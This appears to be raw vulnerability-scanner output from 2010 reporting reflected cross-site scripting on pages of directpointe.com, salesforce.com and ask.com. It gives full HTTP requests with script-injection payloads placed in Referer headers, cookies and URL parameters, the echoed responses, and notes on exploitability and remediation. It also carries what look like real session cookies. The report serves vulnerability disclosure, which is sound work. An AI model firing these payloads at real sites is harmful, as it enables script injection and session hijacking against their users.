GET /solutions/index.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7a4"><script>alert(1)</script>d7c07aef017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/industry_solutions.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 29031
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81edd"><script>alert(1)</script>d90cba90a62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/network_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491b9"><script>alert(1)</script>b3e60a476d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/newsletter.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8832a"><script>alert(1)</script>0cd7a64e812 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/pc_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692cd"><script>alert(1)</script>8b0e02254fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/print_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 29507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bc59"><script>alert(1)</script>a8a958513fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/professional_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd49"><script>alert(1)</script>17a849dc5b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/server_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ac4"><script>alert(1)</script>7bf47ce86a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /solutions/virtual_services.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45763"><script>alert(1)</script>c320424055c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /thanks.aspx HTTP/1.1 Host: www.directpointe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes; Referer: http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 20 Nov 2010 17:16:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright .... 2000-2010 DirectPointe Inc. All rights reserved. All ...[SNIP]... <input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 417d8'-alert(1)-'6dabe70f771 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sat, 20 Nov 2010 17:20:31 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771'; } </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload a9064%0aalert(1)//ea22cc46ca0 was submitted in the REST URL parameter 1. This input was echoed as a9064 alert(1)//ea22cc46ca0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 2a8a4%0aalert(1)//c9db6d901a9 was submitted in the REST URL parameter 2. This input was echoed as 2a8a4 alert(1)//c9db6d901a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7e1'-alert(1)-'b912a2891cb was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb;u4=;u3=;u2=0;ord=-556541467?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e19b3'-alert(1)-'4d5b7994e21 was submitted in the user cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dire19b3'-alert(1)-'4d5b7994e21; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0a4'-alert(1)-'33276c18830 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ans?qsrc=&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830;u4=;u3=;u2=0;ord=-349459782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54944'-alert(1)-'b88ed0e9dd4 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
